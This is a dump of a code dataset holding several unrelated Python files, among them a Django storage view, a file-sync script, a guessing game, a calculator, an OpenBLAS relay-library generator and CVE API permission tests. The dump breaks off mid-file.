id stringlengths 1 8 | text stringlengths 6 1.05M | dataset_id stringclasses 1
value |
|---|---|---|
3268576 | <filename>apps/greencheck/views.py
from datetime import date
from datetime import timedelta
from django.conf import settings
from google.cloud import storage
from django.views.generic.base import TemplateView
class GreenUrlsView(TemplateView):
    """Render a listing of the green-URL snapshot files published in a
    Google Cloud Storage bucket (bucket name from settings.PRESENTING_BUCKET).
    """

    template_name = "green_url.html"

    def fetch_urls(self):
        """Return a list of (blob_name, public_url) tuples for every blob
        currently in the presenting bucket.
        """
        client = storage.Client()
        bucket_name = settings.PRESENTING_BUCKET
        bucket = client.get_bucket(bucket_name)
        blobs = bucket.list_blobs()
        return [(b.name, b.public_url) for b in blobs]

    @property
    def urls(self):
        '''
        Setting the date two weeks in the future. Two weeks from now on
        it will prefetch the urls again
        '''
        # Instance-level cache: refetch only on first access or once the
        # stored expiry date has passed.
        accessed_date = getattr(self, '_date', None)
        if not accessed_date or self._date < date.today():
            self._date = date.today() + timedelta(weeks=2)
            self._urls = self.fetch_urls()
        return self._urls

    def get_context_data(self, **kwargs):
        """Expose the (possibly cached) url list to the template as 'urls'."""
        context = super().get_context_data(**kwargs)
        context['urls'] = self.urls
        return context
| StarcoderdataPython |
250688 | import argparse
import ntpath
import os
from shutil import copyfile
def list_diff(li1, li2):
    """Return the elements present in exactly one of the two lists.

    Duplicates are discarded (the computation goes through sets) and the
    elements that appear only in li1 come before those only in li2, as in
    the original implementation. Within each group the order is arbitrary.
    """
    # The previous version wrapped the concatenation in a redundant extra
    # list() call; the two set differences already produce lists here.
    return list(set(li1) - set(li2)) + list(set(li2) - set(li1))
def get_files_from(location, pattern):
    """Recursively collect file paths under *location*.

    If *pattern* is truthy, only file names containing it (e.g. an
    extension such as '.mp4') are returned; a falsy pattern matches all.
    """
    matches = []
    for root, _dirs, names in os.walk(location):
        for name in names:
            # A falsy pattern means "no filter"; otherwise require a substring hit.
            if not pattern or pattern in name:
                matches.append(os.path.join(root, name))
    return matches
def copy_files_from_non_found_in_b_to_destination(results, destination):
    """Copy every missing or corrupted file reported in *results* into
    *destination*, printing progress for each file."""
    pending = results['non_found_files_in_b'] + results['corrupted_files']
    for source_path in pending:
        print("coping " + source_path + " ...")
        target_path = os.path.join(destination, ntpath.basename(source_path))
        copyfile(source_path, target_path)
        print(source_path + " completed copy")
def print_compared_sizes(results):
    """Pretty-print the dictionary returned by compare_sizes():
    each category name followed by its tab-indented file list, or a
    "There is no ..." line when the category is empty."""
    for type_of_result, files in results.items():
        if not files:
            print("There is no " + type_of_result)
            continue
        print(type_of_result)
        for element in files:
            print('\t' + element)
def compare_sizes(loc_a, loc_b, pattern):
    """Compares sizes of the files in two directories from 2 locations, loc_a and loc_b
    to specify the file type you can use the pattern argument to find by extension
    returns a dictionary:
    copied_files - list of files that are find in both directories
    corrupted_files - list of files that have a different sizes in both directories
    non_found_files_in_a - list of files not found in a but found in b
    non_found_files_in_b - list of files not found in b but found in a
    the lists have the file names found in loc_a except the non_found_files_in_a that are in loc_b"""
    files_in_loc_a = get_files_from(loc_a, pattern)
    files_in_loc_b = get_files_from(loc_b, pattern)
    corrupted_files = []
    copied_files = []
    exists = False
    for file_a in files_in_loc_a:
        basename_file_a = ntpath.basename(file_a)
        # Match files by basename only; compare byte sizes of matches.
        for file_b in files_in_loc_b:
            if basename_file_a == ntpath.basename(file_b):
                exists = True
                # Same name on both sides: equal size counts as a good
                # copy, a differing size as a (presumably) corrupted one.
                if os.path.getsize(file_a) != os.path.getsize(file_b):
                    corrupted_files.append(file_a)
                else:
                    copied_files.append(file_a)
            # NOTE(review): removing file_b from the list being iterated is
            # only safe because we break out of the loop immediately after.
            if exists:
                files_in_loc_b.remove(file_b)
                exists = False
                break
    return {
        'copied_files': copied_files,
        'corrupted_files': corrupted_files,
        # Whatever was never matched (and removed) above exists only in b.
        'non_found_files_in_a': files_in_loc_b,
        'non_found_files_in_b': list_diff(files_in_loc_a, copied_files + corrupted_files)
    }
def delete_files(files):
    """Remove every path in *files*, reporting each deletion."""
    for path in files:
        os.remove(path)
        print("File " + path + ' has deleted.')
if __name__ == "__main__":
    # obs_location = '/home/onikenx/Videos/obs/aulas'
    # drive_location = '/home/onikenx/Clouds/OneDrive/apontamentos-de-aula/extras/gravacoesdeaulas/A3S1'
    parser = argparse.ArgumentParser(description='\tVerifyfiles verifies the files in 2 folders\n'
                                                 'the files can have a pattern to be identified\n'
                                                 'this program can also copy and delete after the copy has done.')
    parser.add_argument('loc_a', type=str,
                        help='location a, from where the files are copied')
    parser.add_argument('loc_b', type=str,
                        help='location b, where the files will be copied')
    parser.add_argument('-e', '--expression', type=str,
                        help='expression that will be used to specify the files, '
                             'can be used to especify the extesion of the file')
    parser.add_argument('-c', '--copy', action='store_true',
                        help='copies files from loc_a to loc_b')
    parser.add_argument('-d', '--delete', action='store_true',
                        help='deletes files from folder a that already have been copied correctly')
    parser.add_argument('-i', '--ignore', action='store_true',
                        help='ignores warning when deleting files')
    # parser.add_argument('-s', '--show', action='store_true',
    #                     help='shows information about the files, if done with -c and/or -d it will show before '
    #                          'and after operations')
    args = parser.parse_args()
    # Verifies that the directories exist
    if not os.path.isdir(args.loc_a):
        print("Dir '" + args.loc_a + "' does not exist.")
        exit(1)
    if not os.path.isdir(args.loc_b):
        print("Dir '" + args.loc_b + "' does not exist.")
        exit(1)
    # --copy: copy missing and corrupted files from loc_a into loc_b.
    if args.copy:
        results = compare_sizes(args.loc_a, args.loc_b, args.expression)
        junction = results['corrupted_files'] + results['non_found_files_in_b']
        if junction:
            print("Files that gonna be copied:")
            for file in junction:
                print("\t" + file)
            copy_files_from_non_found_in_b_to_destination(results, args.loc_b)
        else:
            print('there is no files to be copied')
    # --delete: remove from loc_a the files verified as correctly copied,
    # asking for confirmation unless --ignore was given.
    if args.delete:
        results = compare_sizes(args.loc_a, args.loc_b, args.expression)
        if results['copied_files']:
            print("Files that gonna be deleted:")
            for file in results['copied_files']:
                print("\t" + file)
            if args.ignore:
                delete_files(results['copied_files'])
            elif input("Are you really sure you want to delete these copied_files?[y/n]") == 'y':
                delete_files(results['copied_files'])
        else:
            print('there is no files to be deleted')
    # No action flags: just report the comparison.
    if not args.delete and not args.copy:
        results = compare_sizes(args.loc_a, args.loc_b, args.expression)
        print_compared_sizes(results)
| StarcoderdataPython |
8126296 | <gh_stars>0
#!/usr/bin/python3 -u
# Copyright 2018-present Facebook, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import json
import optparse
import subprocess
import sys
# Command-line interface: Buck passes the path to its test-info JSON and a
# jobs count (accepted for compatibility; unused below).
parser = optparse.OptionParser()
parser.add_option("--buck-test-info")
parser.add_option("--jobs", type=int)
(options, args) = parser.parse_args()
def join_paths(paths):
    """Render *paths* as a Python-literal-style list of single-quoted
    strings, escaping backslashes."""
    quoted = ["'" + p.replace("\\", "\\\\") + "'" for p in paths]
    return "[" + ", ".join(quoted) + "]"
def convert_coverage_to_str(coverage):
    """Render one (ratio, paths) coverage pair as a literal-style string."""
    ratio = coverage[0]
    paths = coverage[1]
    return "[" + repr(ratio) + ", " + join_paths(paths) + "]"
def convert_coverage_entries_to_str(coverage_entries):
    """Render a list of coverage pairs as one literal-style list string."""
    parts = [convert_coverage_to_str(entry) for entry in coverage_entries]
    return "[" + ", ".join(parts) + "]"
# Load the Buck test-info JSON and print the needed-coverage spec of the
# first test target in a Python-literal-style format.
with open(options.buck_test_info) as f:
    test_infos = json.load(f)
coverage = test_infos[0]["needed_coverage"]
print(convert_coverage_entries_to_str(coverage))
| StarcoderdataPython |
8084392 | # Modularização em python
'''VANTAGENS
* ORGANIZAÇÃO DO CÓDIGO
* FACILIDADE DE MANUTENÇÃO
* OCULTAÇÃO DE CÓDIGO DETALHADO
* REUTILIZAÇÃO EM OUTROS PROJETOS'''
'''Para se utilizar de modulos se cria um arquivo com as funções
e quando se quiser usar das mesmas se importa deste arquivo as funçoes para determindado
programa exemplo
Arquivo: uteis
(import uteis)'''
def fatorial(n):
    """Return n! computed iteratively (1 for n <= 0)."""
    produto = 1
    # Multiplying from 2 upward is equivalent to starting at 1.
    for fator in range(2, n + 1):
        produto *= fator
    return produto
# Demo driver: read an integer and show its factorial.
num = int(input("Digite um valor "))
fat = fatorial(num)
print(f"O fatorial de {num} é {fat}")
11255818 | import typing as t
from werkzeug.datastructures import Headers
from werkzeug.wrappers import BaseResponse
# "String-like" alias used throughout the response typing below.
_str_bytes = t.Union[str, bytes]
# Anything a view may return as the response body: raw text/bytes, a
# prebuilt response object, a JSON-able dict, or a raw WSGI application
# callable (environ, start_response) -> iterable of byte chunks.
_data_type = t.Union[
    _str_bytes,
    BaseResponse,
    t.Dict[str, t.Any],
    t.Callable[
        [t.Dict[str, t.Any], t.Callable[[str, t.List[t.Tuple[str, str]]], None]],
        t.Iterable[bytes],
    ],
]
# HTTP status: a numeric code or a full status line string.
_status_type = t.Union[int, _str_bytes]
# Headers: a werkzeug Headers object, a mapping, or an iterable of pairs.
_headers_type = t.Union[
    Headers,
    t.Dict[_str_bytes, _str_bytes],
    t.Iterable[t.Tuple[_str_bytes, _str_bytes]],
]
# Full view return contract: body alone, or body plus status and/or headers.
view_return_type = t.Union[
    _data_type,
    t.Tuple[_data_type],
    t.Tuple[_data_type, _status_type],
    t.Tuple[_data_type, _headers_type],
    t.Tuple[_data_type, _status_type, _headers_type],
]
| StarcoderdataPython |
3389903 | """
Name: <NAME>
CIS 41A Spring 2020
Unit E Take-Home Assignment
"""
# Second Script – Guessing Game
# Write a script that plays a simple guessing game.
# The script will generate a secret number from 1 to 100, inclusive, and the user will have to guess the number.
# After each guess, the script will tell the user if they are high, low, or correct.
# If they are correct, the script will congratulate the user, tell them how many guesses they took, and then end the script.
# Hint: most of the game code will be in a loop that repeats until the correct number is guessed.
# To generate the secret number, you will need to use the randint function from Python's Random module, as follows:
# import random
#
# #this generates a random int from 1-100, inclusive
# secretNum = random.randint(1,100)
# Example output:
#
# Welcome to the guessing game.
# You need to guess a number from 1 to 100.
# What is your guess? 50
# Guess is too low.
# What is your guess? 75
# Guess is too low.
# What is your guess? 87
# Guess is too high.
# What is your guess? 81
# Guess is too low.
# What is your guess? 84
# Guess is too low.
# What is your guess? 85
# Congratulations!
# You guessed the secret number in 6 guesses!
import random

# BUG FIX: randint's upper bound is inclusive, so randint(1, 101) could
# draw 101 — a number the player is told is impossible to guess. The
# assignment spec (and the comment above) call for randint(1, 100).
secretNum = random.randint(1, 100)

print("Welcome to the guessing game")
print("You need to guess a number from 1 to 100.")

count = 0  # number of guesses taken so far
while True:
    num = int(input("What is your guess? "))
    count += 1
    if num > secretNum:
        print("Guess is too high")
    elif num < secretNum:
        print("Guess is too low")
    elif num == secretNum:
        print("Congratulations!")
        break

# BUG FIX: the result line was printed twice (once via f-string, once via
# str.format); keep a single report of the guess count.
print(f"You guessed the secret number in {count} guesses!")
"""
Execution results:
/usr/bin/python3 /Users/jakkus/PycharmProjects/CIS41A/CIS41A_UNITE_TAKEHOME_ASSIGNMENT_2.py
Welcome to the guessing game
You need to guess a number from 1 to 100.
What is your guess? 50
Guess is too high
What is your guess? 30
Guess is too low
What is your guess? 40
Guess is too low
What is your guess? 45
Guess is too high
What is your guess? 44
Guess is too high
What is your guess? 41
Guess is too low
What is your guess? 42
Congratulations!
You guessed the secret number in 7 guesses!
Process finished with exit code 0
""" | StarcoderdataPython |
6474025 | <gh_stars>0
# -*- codeing: utf-8 -*-
class Calculator(object):
    """Evaluate flat arithmetic expressions over non-negative integers with
    +, -, * and / (true division), honouring the usual precedence.
    No parentheses or whitespace are supported; an empty string yields 0.
    Each private parser returns the value parsed so far plus the unconsumed
    remainder of the input."""

    def calculate(self, src):
        """Evaluate *src* and return its numeric value (0 for '')."""
        if not src:
            return 0
        return self._parse_expression(src)

    def _parse_expression(self, src):
        # expression := term (('+' | '-') term)*
        value, rest = self._parse_term(src)
        while rest:
            op = rest[0]
            if op == '+':
                term, rest = self._parse_term(rest[1:])
                value += term
            elif op == '-':
                term, rest = self._parse_term(rest[1:])
                value -= term
            else:
                break
        return value

    def _parse_term(self, src):
        # term := arg (('*' | '/') arg)*
        value, rest = self._parse_arg(src)
        while rest:
            op = rest[0]
            if op == '*':
                arg, rest = self._parse_arg(rest[1:])
                value *= arg
            elif op == '/':
                arg, rest = self._parse_arg(rest[1:])
                value /= arg
            else:
                break
        return (value, rest)

    def _parse_arg(self, src):
        # arg := longest operator-free prefix, parsed as an int
        stop = 0
        while stop < len(src) and src[stop] not in '+-*/':
            stop += 1
        return (int(src[:stop]), src[stop:])
import unittest

class CalculatorTest(unittest.TestCase):
    """Unit tests covering empty input, a bare number, each of the four
    operators, and operator precedence across a mixed expression."""

    def setUp(self):
        self.calculator = Calculator()

    def test_calculates_0_when_given_an_empty_string(self):
        self.assertEqual(0, self.calculator.calculate(""))

    def test_calculates_a_number(self):
        self.assertEqual(123, self.calculator.calculate("123"))

    def test_calculates_addtion(self):
        self.assertEqual(23, self.calculator.calculate("20+3"))

    def test_calculates_subtraction(self):
        self.assertEqual(17, self.calculator.calculate("20-3"))

    def test_calculates_multiplication(self):
        self.assertEqual(33, self.calculator.calculate("11*3"))

    def test_calculates_division(self):
        self.assertEqual(5, self.calculator.calculate("10/2"))

    def test_calculates_multiple_operations(self):
        # Exercises precedence: 36 + 2 - 20 + 5 == 23.
        self.assertEqual(23, self.calculator.calculate("36+2-5*4+40/8"))
| StarcoderdataPython |
6643149 | #!/usr/bin/python3
'''
OpenBLAS Relay Library Generator
Copyright (C) 2019 <NAME> <<EMAIL>>
License: MIT/Expat
Julia decided to mangle the symbols of the vendored copy of openblas
(INTERFACE64=1). I didn't read all the past discussions but in fact the symbol
mangling introduced difficulty in distribution packaging, and the mangling rule
is not standarlized yet.
I'm been updating the whole BLAS/LAPACK ecosystem on Debian(Ubuntu) since long
time ago. Our original plan was to provide libopenblas64.so without symbol
mangling, because MKL doesn't mangle the symbols and we expect every
BLAS/LAPACK implementation could be used as a drop-in replacement in the
system.
To provide support for Julia's libopenblas64_.so, indeed we could compile
src:openblas again with slightly different configuration, but then we will have
to build it 7 times (32/64-bit indexing * serial,pthread,openmp). And the
one compiled for Julia will be almost a duplicated one.
I'm trying to generate a "relay" library to provide ABIs like "sgemm_64_" which
immediately calls the "sgemm_" from libopenblas64.so (no mangling). The "relay"
library can be compiled as "libopenblas64_.so.0" with a correcponding SONAME,
and linked against "libopenblas64.so.0". So we can reuse a existing
64-bit-indexing openblas.
With slight tweaks, this library can also work with MKL.
'''
import re
import sys
import os
import argparse
def read_mkl_headers(dirname: str = '/usr/include/mkl') -> dict:
    '''
    Read the MKL header files: mkl_{,c}blas.h, mkl_lapack{,e}.h

    Returns a dict mapping each header basename (without .h) to its text.
    Raises FileNotFoundError if a header is missing from *dirname*.
    '''
    headers = {}
    # BUG FIX: the second key was a corrupted '<KEY>' placeholder; per the
    # docstring the intended header set is blas/cblas/lapack/lapacke.
    for key in ('mkl_blas', 'mkl_cblas', 'mkl_lapack', 'mkl_lapacke'):
        with open(os.path.join(dirname, key + '.h'), 'rt') as f:
            headers[key] = f.read()
    return headers
def generate_relay_lib(headers: dict = {}, opts: dict = {}) -> str:
    '''
    Generate the Relay Library C Code

    Scrapes prototypes out of the MKL headers in *headers* and emits, for
    each routine, a C wrapper whose name carries opts['dmangle'] and whose
    body forwards to the opts['smangle']-suffixed symbol. opts also
    supplies 'int' (C type standing in for MKL_INT) and 'abi', a
    comma-separated subset of blas/cblas/lapack/lapacke.
    '''
    lib = []
    # Preamble: complex-value structs, the *_SELECT_FUNCTION_* callback
    # typedefs some LAPACK routines take, and relays for the openblas_*
    # service functions.
    # NOTE(review): the int/char* service wrappers below omit the C
    # 'return' keyword — confirm whether that relies on undefined behavior.
    lib.extend(f'''
typedef struct _complex8 {{ float* real; float* imag; }} complex8;
typedef struct _complex16 {{ double* real; double* imag; }} complex16;
typedef {opts['int']} (*C_SELECT_FUNCTION_1) ( const complex8* );
typedef {opts['int']} (*C_SELECT_FUNCTION_2) ( const complex8*, const complex8* );
typedef {opts['int']} (*D_SELECT_FUNCTION_2) ( const double*, const double* );
typedef {opts['int']} (*D_SELECT_FUNCTION_3) ( const double*, const double*, const double* );
typedef {opts['int']} (*S_SELECT_FUNCTION_2) ( const float*, const float* );
typedef {opts['int']} (*S_SELECT_FUNCTION_3) ( const float*, const float*, const float* );
typedef {opts['int']} (*Z_SELECT_FUNCTION_1) ( const complex16* );
typedef {opts['int']} (*Z_SELECT_FUNCTION_2) ( const complex16*, const complex16* );
void openblas_set_num_threads64_(int num_threads) {{ openblas_set_num_threads(num_threads); }};
int openblas_get_num_threads64_(void) {{ openblas_get_num_threads(); }};
int openblas_get_num_procs64_(void) {{ openblas_get_num_procs(); }};
char* openblas_get_config64_(void) {{ openblas_get_config(); }};
char* openblas_get_corename64_(void) {{ openblas_get_corename(); }};
int openblas_get_parallel64_(void) {{ openblas_get_parallel(); }};
'''.split('\n'))
    if 'blas' in opts['abi'].split(','):
        # BLAS prototypes look like "ret sgemm(args);" (no trailing
        # underscore in the header; the Fortran ABI one is added here).
        for api in re.findall('\w+?\s+[sdczlix][a-z0-9]+\(.*?\)\s*;',
                              headers['mkl_blas'], flags=re.DOTALL):
            if '#' in api:
                continue  # skip matches that swallowed a preprocessor line
            # Normalize whitespace and rewrite MKL types to plain C ones.
            api = ' '.join(api.replace('\n', ' ').split())
            api = re.sub('MKL_INT', opts['int'], api)
            api = re.sub('MKL_Complex8', 'complex8', api)
            api = re.sub('MKL_Complex16', 'complex16', api)
            tp, name, args = re.match(
                r'(\w+?)\s+([sdczlix][a-z0-9]+)\((.*?)\)\s*;', api).groups()
            # Strip types and '*' from the parameter list to get bare names.
            argnames = ', '.join([x.split()[-1].replace('*', '')
                                  for x in args.split(',')])
            lib.extend(f'''
{tp} {name+'_'+opts['dmangle']} (
{args})
{{
{'return' if 'void'!=tp else ''} {name+'_'+opts['smangle']}({argnames});
}};
'''.split('\n'))
            print('RELAY', name + '_' + opts['smangle'], '->',
                  name + '_' + opts['dmangle'], '(', argnames, ')')
    if 'cblas' in opts['abi'].split(','):
        raise NotImplementedError
    if 'lapack' in opts['abi'].split(','):
        # LAPACK prototypes already carry the Fortran trailing underscore.
        for api in re.findall('\w+?\s+[sdcz][a-z0-9]+_\(.*?\)\s*;',
                              headers['mkl_lapack'], flags=re.DOTALL):
            api = ' '.join(api.replace('\n', ' ').split())
            api = re.sub('MKL_INT', opts['int'], api)
            api = re.sub('MKL_Complex8', 'complex8', api)
            api = re.sub('MKL_Complex16', 'complex16', api)
            api = re.sub('MKL_', '', api)
            tp, name, args = re.match(
                r'(\w+?)\s+([sdcz][a-z0-9]+_)\((.*?)\)\s*;', api).groups()
            argnames = ', '.join([x.split()[-1].replace('*', '')
                                  for x in args.split(',')])
            # Zero-argument prototypes are spelled "(void)" in C.
            argnames = '' if argnames == 'void' else argnames
            lib.extend(f'''
{tp} {name+opts['dmangle']} (
{args})
{{
{'return' if 'void'!=tp else ''} {name+opts['smangle']}({argnames});
}};
'''.split('\n'))
            print('RELAY', name +
                  opts['smangle'], '->', name +
                  opts['dmangle'], '(', argnames, ')')
    if 'lapacke' in opts['abi'].split(','):
        raise NotImplementedError
    return '\n'.join(lib)
if __name__ == '__main__':
    # parse arguments
    ag = argparse.ArgumentParser()
    ag.add_argument('-A', '--abi', type=str, default='blas,lapack',
                    help='Set of ABIs that the relay library should provide')
    ag.add_argument('-o', '--output', type=str, default='./openblas-relay.c')
    ag.add_argument('--mkl', type=str, default='/usr/include/mkl')
    ag.add_argument('--int', type=str, default='long')
    ag.add_argument('--smangle', type=str, default='',
                    help='Mangle the source symbol')
    ag.add_argument('--dmangle', type=str, default='64_',
                    help='Mangle the destination symbol')
    ag = vars(ag.parse_args(sys.argv[1:]))
    # generate the library
    headers = read_mkl_headers(ag['mkl'])
    with open(ag['output'], 'wt') as f:
        f.write(generate_relay_lib(headers, ag))
    # NOTE(review): the compile and cleanup steps below hard-code
    # 'openblas-relay.c' instead of using ag['output'] — they break if -o
    # is overridden; confirm before relying on that flag.
    os.system('gcc -flto -O2 -g -shared -fPIC openblas-relay.c -o libopenblas64_.so.0 -L. -lopenblas64 -Wno-implicit-function-declaration -Wl,-soname -Wl,libopenblas64_.so.0')
    os.unlink('openblas-relay.c')
| StarcoderdataPython |
3331392 | # -*- coding: utf-8 -*-
import os
class Constants():
    """Shared configuration constants for cosycar."""
    # Scratch files used to persist state between runs.
    time_to_leave_file = '/tmp/cosycar_will_leave_at.txt'
    weather_storage_file = '/tmp/cosycar_weather.txt'
    # Interval between weather refreshes — presumably minutes; confirm
    # against the scheduler that consumes it.
    weather_interval = 15
    log_format = '%(asctime)s - %(name)s - %(levelname)s - %(message)s'
    # Config file resolved to $HOME/.config/cosycar.cfg at import time.
    cfg_file_path = '.config'
    cfg_file_name = 'cosycar.cfg'
    home_dir = os.environ['HOME']  # NOTE(review): raises KeyError if HOME is unset
    cfg_file = os.path.join(home_dir, cfg_file_path, cfg_file_name)
| StarcoderdataPython |
8047517 | # politician/urls.py
# Brought to you by <NAME>. Be good.
# -*- coding: UTF-8 -*-
from . import views_admin
from django.conf.urls import url
# URL routes for the politician admin pages. All views live in
# views_admin; the route names are used for reverse() lookups.
urlpatterns = [
    url(r'^$', views_admin.politician_list_view, name='politician_list',),
    url(r'^edit_process/$', views_admin.politician_edit_process_view, name='politician_edit_process'),
    url(r'^delete/', views_admin.politician_delete_process_view, name='politician_delete_process'),
    # Pull politician data down from the master server.
    url(r'^import/$',
        views_admin.politicians_import_from_master_server_view, name='politicians_import_from_master_server'),
    url(r'^new/$', views_admin.politician_new_view, name='politician_new'),
    url(r'^(?P<politician_id>[0-9]+)/edit/$', views_admin.politician_edit_view, name='politician_edit'),
    url(r'^(?P<politician_id>[0-9]+)/retrieve_photos/$',
        views_admin.politician_retrieve_photos_view, name='politician_retrieve_photos'),
    # url(r'^(?P<politician_id>[0-9]+)/tag_new/$', views.politician_tag_new_view, name='politician_tag_new'),
    # url(r'^(?P<politician_id>[0-9]+)/tag_new_process/$',
    #     views.politician_tag_new_process_view, name='politician_tag_new_process'),
    # url(r'^(?P<pk>[0-9]+)/add_tag/$', views.PoliticianAddTagView.as_view(), name='politician_add_tag'),
]
8149326 | import pyOcean_cpu as ocean
# Type casting applied to storage objects
# Type casting applied to storage objects
s = ocean.asTensor([1,2,3]).storage
print(s)
# Cast to a new int8 storage (t is distinct from s).
t = ocean.int8(s)
print(t)
# NOTE(review): the second argument presumably requests an in-place cast —
# s is printed again below to show the effect; confirm against the
# pyOcean API docs.
ocean.float(s, True)
print(s)
| StarcoderdataPython |
1801615 | # Tests in this file use an Org admin user provided by a Pytest fixture. The
# tests here should be a subset of the secretariat tests, since the CNA of last
# resort should always be able to perform any root CNA functionality in
# addition to functionality reserved for the CNA of last resort.
import json
import requests
import uuid
from src import env, utils
from src.test.org_user_tests.org import (ORG_URL, create_new_user_with_new_org_by_uuid,
create_new_user_with_new_org_by_shortname,
post_new_org_user, post_new_org)
from src.utils import (assert_contains, ok_response_contains,
ok_response_contains_json, response_contains,
response_contains_json)
#### PUT /org/:shortname/user/:username ####
def test_regular_user_update_name_and_username(reg_user_headers):
    """ regular users can update their name & username """
    org = reg_user_headers['CVE-API-ORG']
    user = reg_user_headers['CVE-API-USER']
    new_username = str(uuid.uuid4())  # used in query
    res = requests.put(
        f'{env.AWG_BASE_URL}{ORG_URL}/{org}/user/{user}?name.first=aaa&name.last=bbb&name.middle=ccc&name.suffix=ddd',
        headers=reg_user_headers
    )
    assert res.status_code == 200
    assert json.loads(res.content.decode())['updated']['name']['first'] == 'aaa'
    assert json.loads(res.content.decode())['updated']['name']['last'] == 'bbb'
    assert json.loads(res.content.decode())['updated']['name']['middle'] == 'ccc'
    assert json.loads(res.content.decode())['updated']['name']['suffix'] == 'ddd'
    res = requests.put(
        f'{env.AWG_BASE_URL}{ORG_URL}/{org}/user/{user}?new_username={new_username}',
        headers=reg_user_headers
    )
    assert res.status_code == 200
    assert json.loads(res.content.decode())['updated']['username'] == new_username

def test_regular_user_cannot_update_for_another_user(reg_user_headers):
    """ regular users cannot update information of another user of the same organization """
    org = reg_user_headers['CVE-API-ORG']
    user = reg_user_headers['CVE-API-USER']
    user2 = str(uuid.uuid4())
    res = post_new_org_user(org, user2)  # creating a user with same org as regular user
    assert res.status_code == 200
    user_name = str(uuid.uuid4())  # create a new name to give to second user
    res = requests.put(
        f'{env.AWG_BASE_URL}{ORG_URL}/{org}/user/{user2}?new_username={user_name}',
        headers=reg_user_headers
    )
    assert res.status_code == 403
    response_contains_json(res, 'error', 'NOT_SAME_USER_OR_SECRETARIAT')

def test_regular_user_cannot_update_duplicate_user_with_new_username(reg_user_headers):
    """ regular users cannot update a user's username if that user already exist """
    org = reg_user_headers['CVE-API-ORG']
    user1 = reg_user_headers['CVE-API-USER']
    user2 = str(uuid.uuid4())
    res = post_new_org_user(org, user2)  # creating a user with same org as regular user
    assert res.status_code == 200
    # Attempt to rename user1 to the just-created user2's name.
    res = requests.put(
        f'{env.AWG_BASE_URL}{ORG_URL}/{org}/user/{user1}?new_username={user2}',
        headers=reg_user_headers
    )
    assert res.status_code == 403
    response_contains_json(res, 'error', 'DUPLICATE_USERNAME')

def test_regular_user_cannot_update_organization_with_new_shortname(reg_user_headers):
    """ regular users cannot update organization """
    user = reg_user_headers['CVE-API-USER']
    org1 = reg_user_headers['CVE-API-ORG']
    org2 = str(uuid.uuid4())
    res = requests.put(
        f'{env.AWG_BASE_URL}{ORG_URL}/{org1}/user/{user}?org_shortname={org2}',
        headers=reg_user_headers
    )
    assert res.status_code == 403
    response_contains_json(res, 'error', 'NOT_ALLOWED_TO_CHANGE_ORGANIZATION')
def test_regular_user_cannot_update_active_state(reg_user_headers):
    """ regular user cannot change its own active state """
    org = reg_user_headers['CVE-API-ORG']
    user = reg_user_headers['CVE-API-USER']
    res = requests.put(
        f'{env.AWG_BASE_URL}{ORG_URL}/{org}/user/{user}?active=false',
        headers=reg_user_headers
    )
    assert res.status_code == 403
    response_contains_json(res, 'error', 'NOT_ORG_ADMIN_OR_SECRETARIAT')

def test_regular_user_cannot_add_role(reg_user_headers):
    """ regular users cannot add role """
    org = reg_user_headers['CVE-API-ORG']
    user = reg_user_headers['CVE-API-USER']
    res = requests.put(
        f'{env.AWG_BASE_URL}{ORG_URL}/{org}/user/{user}?active_roles.add=admin',  # adding role
        headers=reg_user_headers
    )
    assert res.status_code == 403
    response_contains_json(res, 'error', 'NOT_ORG_ADMIN_OR_SECRETARIAT')

def test_regular_user_cannot_remove_role(reg_user_headers):
    """ regular users cannot remove role """
    org = reg_user_headers['CVE-API-ORG']
    user = reg_user_headers['CVE-API-USER']
    res = requests.put(
        f'{env.AWG_BASE_URL}{ORG_URL}/{org}/user/{user}?active_roles.remove=admin',  # removing role
        headers=reg_user_headers
    )
    assert res.status_code == 403
    response_contains_json(res, 'error', 'NOT_ORG_ADMIN_OR_SECRETARIAT')

def test_regular_user_cannot_update_user_org_dne(reg_user_headers):
    """ regular user cannot update a user from an org that doesn't exist """
    org = str(uuid.uuid4())  # random shortname, never registered
    user = reg_user_headers['CVE-API-USER']
    res = requests.put(
        f'{env.AWG_BASE_URL}{ORG_URL}/{org}/user/{user}',
        headers=reg_user_headers
    )
    assert res.status_code == 404
    response_contains_json(res, 'error', 'ORG_DNE_PARAM')

def test_reg_user_cannot_update_user_dne(reg_user_headers):
    """ regular user cannot update a user that doesn't exist """
    org = reg_user_headers['CVE-API-ORG']
    user = str(uuid.uuid4())  # random username, never registered
    res = requests.put(
        f'{env.AWG_BASE_URL}{ORG_URL}/{org}/user/{user}',
        headers=reg_user_headers
    )
    assert res.status_code == 404
    response_contains_json(res, 'error', 'USER_DNE')
#### POST /org/:shortname/user ###
def test_reg_user_cannot_create_user(reg_user_headers):
    """ regular user cannot create another user """
    org = reg_user_headers['CVE-API-ORG']
    user_name = str(uuid.uuid4())
    res = requests.post(
        f'{env.AWG_BASE_URL}{ORG_URL}/{org}/user',
        headers=reg_user_headers,
        json={'username': user_name}
    )
    assert res.status_code == 403
    response_contains_json(res, 'error', 'NOT_ORG_ADMIN_OR_SECRETARIAT')

#### PUT /org/:shortname ####
def test_reg_user_cannot_update_org(reg_user_headers):
    """ regular user cannot update an organization """
    org = str(uuid.uuid4())
    res = requests.put(
        f'{env.AWG_BASE_URL}{ORG_URL}/{org}',
        headers=reg_user_headers
    )
    assert res.status_code == 403
    response_contains_json(res, 'error', 'SECRETARIAT_ONLY')

#### GET /org/:identifier ####
def test_reg_user_can_view_same_org(reg_user_headers):
    """ regular users can view the organization they belong to """
    org = reg_user_headers['CVE-API-ORG']
    res = requests.get(
        f'{env.AWG_BASE_URL}{ORG_URL}/{org}',
        headers=reg_user_headers
    )
    ok_response_contains_json(res, 'short_name', org)

def test_reg_user_cannot_view_another_org(reg_user_headers):
    """ regular users cannot view an organization they don't belong to """
    org = str(uuid.uuid4())
    res = requests.get(
        f'{env.AWG_BASE_URL}{ORG_URL}/{org}',
        headers=reg_user_headers
    )
    assert res.status_code == 403
    response_contains_json(res, 'error', 'NOT_SAME_ORG_OR_SECRETARIAT')

#### GET /org ####
def test_reg_user_cannot_view_orgs(reg_user_headers):
    """ regular users cannot view all organizations """
    res = requests.get(
